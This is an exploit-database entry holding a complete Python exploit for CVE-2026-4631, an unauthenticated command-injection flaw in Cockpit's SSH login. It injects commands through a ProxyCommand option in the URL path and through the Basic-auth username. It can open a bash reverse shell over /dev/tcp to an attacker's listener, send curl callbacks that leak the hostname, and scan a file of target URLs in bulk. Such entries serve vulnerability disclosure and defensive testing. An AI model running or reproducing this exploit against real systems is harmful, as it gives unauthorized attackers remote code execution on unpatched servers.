Cockpit 359 - RCE

EDB-ID:

52572




Platform:

Multiple

Date:

2026-05-21


 # Exploit Title: Cockpit 359 - RCE
 # Date: 18-04-2026
 # Exploit Author: @intx0x80
 # Vendor Homepage: https://cockpit-project.org/
 # Software Link: https://github.com/cockpit-project/cockpit
 # Version: 327-359
 # Tested on: Debain
 # CVE : CVE-2026-4631

import base64
import argparse
import requests
import urllib3
import urllib.parse
import sys

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

RED    = "\033[91m"
GREEN  = "\033[92m"
YELLOW = "\033[93m"
CYAN   = "\033[96m"
BOLD   = "\033[1m"
RESET  = "\033[0m"

def banner():
    print(f"""{CYAN}{BOLD}
╔══════════════════════════════════════════════════════════════╗
║         CVE-2026-4631  -  Cockpit SSH Argument Injection     ║
║         Unauthenticated Remote Code Execution                ║
╚══════════════════════════════════════════════════════════════╝


            @intx0x80


{RESET}""")

def info(msg):  print(f"{CYAN}[*]{RESET} {msg}")
def ok(msg):    print(f"{GREEN}[+]{RESET} {msg}")
def warn(msg):  print(f"{YELLOW}[!]{RESET} {msg}")
def err(msg):   print(f"{RED}[-]{RESET} {msg}")
def die(msg):   err(msg); sys.exit(1)

def make_auth_header(username="invalid", password="PWN"):
    creds = f"{username}:{password}"
    encoded = base64.b64encode(creds.encode()).decode()
    return f"Basic {encoded}"

def exploit_hostname(target, session, command):
    print(f"\n{YELLOW}[*] Attack vector: Hostname ProxyCommand injection{RESET}")
    encoded_cmd = urllib.parse.quote(command, safe="")
    url = f"{target}/cockpit+=-oProxyCommand={encoded_cmd}/login"

    print(f"[*] Request: GET {url}")

    headers = {
        "Authorization": make_auth_header(),
        "Referer": f"{target}/",
        "Origin": target,
    }

    try:
        r = session.get(url, headers=headers, timeout=10)
        print(f"[*] Response: {r.status_code}")

        if r.status_code in (200, 401, 403, 500):
            print("[+] Request delivered - SSH process spawned")
            print("[+] ProxyCommand executed (if OpenSSH < 9.6 on target)")

        snippet = r.text[:200].strip()
        if snippet:
            print(f"[*] Body snippet: {snippet}")

    except requests.exceptions.ConnectionError:
        print("[+] Connection reset - server may have crashed (command ran)")
    except Exception as e:
        print(f"[-] Error: {e}")

def exploit_username(target, session, command, ssh_host="127.0.0.1"):
    print(f"\n{YELLOW}[*] Attack vector Username %%r token injection{RESET}")
    print(f"[*] Command: {command}")

    payload_user = f"x; {command}; #"
    print(f"[*] Username payload: {payload_user}")

    headers = {
        "Authorization": make_auth_header(username=payload_user, password="invalid"),
        "Referer": f"{target}/",
        "Origin": target,
    }

    url = f"{target}/cockpit+={ssh_host}/login"

    try:
        r = session.get(url, headers=headers, timeout=10)
        tm = r.elapsed.total_seconds()
        # print(f"[+] Time {tm}")
        # print(f"[*] Response: {r.status_code}")
        if r.status_code in (200, 401, 403, 500):
            print("[+] Request delivered")
        else:
            print(f"[-] Unexpected status code: {r.status_code}")

    except requests.exceptions.ConnectionError:
        print("[+] Connection reset")
    except Exception as e:
        print(f"[-] Error: {e}")

def detect_time_based(target, session, command, ssh_host="127.0.0.1"):
    print(f"{GREEN}[+] Scanning target: {target}{RESET}")
    payload_user = f"x; {command}; #"

    headers = {
        "Authorization": make_auth_header(username=payload_user, password="invalid"),
        "Referer": f"{target}/",
        "Origin": target,
    }

    url = f"{target}/cockpit+={ssh_host}/login"

    try:
        r = session.get(url, headers=headers, timeout=10)
        tm = r.elapsed.total_seconds()
        
        if tm >= 5:
            print(f"{GREEN}[+] Vulnerable (Time-based): {target} (Duration: {tm:.2f}s){RESET}")
        else:
            print(f"[-] Not Vulnerable (Time-based): {target} (Duration: {tm:.2f}s)")
            
        if r.status_code in (200, 401, 403, 500):
            pass 

    except requests.exceptions.ConnectionError:
        print("[+] Connection reset")
    except Exception as e:
        print(f"[-] Error: {e}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2026-4631")
    parser.add_argument("--target", required=False, help="Cockpit URL e.g. http://127.0.0.1:9090")
    parser.add_argument("--vector", choices=["hostname", "username"], help="Injection vector")
    parser.add_argument("--cmd", help="Command to execute")
    parser.add_argument("--callback", help="OOB callback URL (hostname vector or DNS lookup)")
    parser.add_argument("--lhost", help="Reverse shell listener IP")
    parser.add_argument("--lport", type=int, default=4444, help="Reverse shell port (default 4444)")
    parser.add_argument("--ssh-host", default="127.0.0.1", help="SSH host for username vector")
    parser.add_argument("--file", default="url.txt", help="File containing URLs to scan")

    args = parser.parse_args()

    if not args.target and not args.file:
        die("[-] Error: Either --target or --file is required.")

    if not args.vector:
        print("\n[*] Detection complete. Use --vector to exploit.")
        return

    session = requests.Session()
    session.verify = False

    if args.vector == "hostname":
        if args.lhost:
            cmd = f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"
        elif args.callback:
            cmd = f"curl `hostname`.{args.callback}"
        elif args.cmd:
            cmd = args.cmd
        else:
            die("[-] Hostname vector needs --cmd, --callback, or --lhost")
        
        if args.target:
            target = args.target.rstrip("/")
            exploit_hostname(target, session, cmd)
        else:
            die("[-] Hostname vector requires --target")

    elif args.vector == "username":
        if args.target:
            target = args.target.rstrip("/")
            
            if args.callback:
                cmd = f"curl {args.callback}"
                exploit_username(target, session, cmd, args.ssh_host)
            
            elif args.cmd:
                exploit_username(target, session, args.cmd, args.ssh_host)
            
            elif args.lhost:
                cmd = f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"
                exploit_username(target, session, cmd, args.ssh_host)
            
            else:
                print("[*] No command/callback provided. Running time-based detection...")
                detect_time_based(target, session, "sleep 5", args.ssh_host)

        elif args.file:
            try:
                with open(args.file, "r") as f:
                    urls = [line.strip() for line in f if line.strip()]
            except FileNotFoundError:
                die(f"[-] File not found: {args.file}")

            if args.callback:
                print(f"{GREEN}[+] Scanning {len(urls)} targets with callback: {args.callback}{RESET}")
                for target in urls:
                    linker = target.strip().split(":")[1].replace("//", "") if ":" in target else "unknown"
                    cmd = f"curl `hostname`.{linker}-{args.callback}"
                    exploit_username(target, session, cmd, args.ssh_host)
            
            else:
                print(f"{YELLOW}[+] Scanning {len(urls)} targets for time-based vulnerability...{RESET}")
                for target in urls:
                    detect_time_based(target, session, "sleep 5", args.ssh_host)

if __name__ == "__main__":
    banner()
    main()